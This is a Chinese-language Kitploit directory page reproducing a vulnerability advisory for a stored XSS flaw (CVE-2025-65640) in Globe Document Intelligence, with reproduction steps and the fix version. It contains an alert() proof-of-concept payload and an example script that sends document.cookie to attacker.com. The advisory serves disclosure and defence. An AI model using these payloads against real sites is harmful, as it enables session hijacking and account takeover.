Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-65640 — CVE-2025-65640 公开公告:Globe Document Intelligence 存在存储型 XSS 漏洞 | Kitploit
工具/GitHubGitHub/vincenzo-emanuele/cve-2025-65640
漏洞分析Web应用程序漏洞利用Web安全渗透测试论文与研究学习与教育
GitHubvincenzo-emanuele/cve-2025-65640

CVE-2025-65640

CVE-2025-65640 公开公告:Globe Document Intelligence 存在存储型 XSS 漏洞

查看仓库
102个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-65640

1. 漏洞信息

  • CVE ID: CVE-2025-65640(目前为保留状态)
  • 漏洞类型: 存储型跨站脚本(XSS)
  • CVSSv3 评分: 6.3 (AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N)
  • 厂商: Arket/Bluenext S.r.l.
  • 产品: Globe Document Intelligence
  • 受影响版本: 5.0.0.559
  • 发现者: Vincenzo Emanuele Martone

2. 描述

在 Globe Document Intelligence 平台(版本 5.0.0.559)中发现了一个存储型跨站脚本(XSS)漏洞。 该应用程序未能正确清理或编码新建文档“Title”属性中的用户输入。 当经过身份验证的用户导航到摘要页面(例如,“Task in progress / Recent”)时,恶意载荷会在受害者的浏览器上下文中被反射并执行。

3. 影响

该漏洞允许经过身份验证的攻击者在服务器上存储恶意 JavaScript 代码。 当其他经过身份验证的用户(包括管理员账户)查看受影响的页面时,该脚本会自动执行。 虽然下面的概念验证(PoC)使用良性的 alert() 演示了该漏洞,但攻击者可以将此漏洞武器化,以实现会话劫持和账户接管。 例如,注入类似 <script>fetch('https://attacker.com/?cookie='+encodeURIComponent(document.cookie))</script> 的载荷,会悄无声息地将受害者的会话 Cookie 外泄到攻击者控制的外部服务器。

4. 复现步骤(概念验证)

要复现该漏洞,经过身份验证的攻击者可以执行以下步骤:

  1. 导航到文档创建部分(“Nuovo documento”),并使用任意数据填写必填字段,以成功创建新文档。
  2. 提交表单并创建文档。
  3. 选择新建的文档,打开上下文菜单(右键单击 -> 文档属性),然后找到“Title”字段。
  4. 将以下基础 XSS 载荷注入“Title”字段:<script>alert("XSS")</script>
  5. 保存更改。恶意载荷现在已持久化存储在数据库中。
  6. 导航到“Task in progress / Recent”(Task in attesa/Recenti)页面。
  7. 由于页面在未进行正确输出编码的情况下渲染文档标题,JavaScript 载荷被执行,从而触发警报。

5. 建议缓解措施

据厂商称,该漏洞已在 5.1.0.575 版本中得到修复。 为修复此问题,建议将 Globe Document Intelligence 平台更新到 5.1.0.575 版本。


免责声明

本概念验证(PoC)仅供教育和研究目的使用。 本文档中详细描述的信息和代码不得用于恶意活动,也不得在未经系统所有者明确事先授权的情况下针对任何系统使用。作者不承担任何责任,也不对因使用所提供材料而造成的任何滥用或损害负责。

下载工具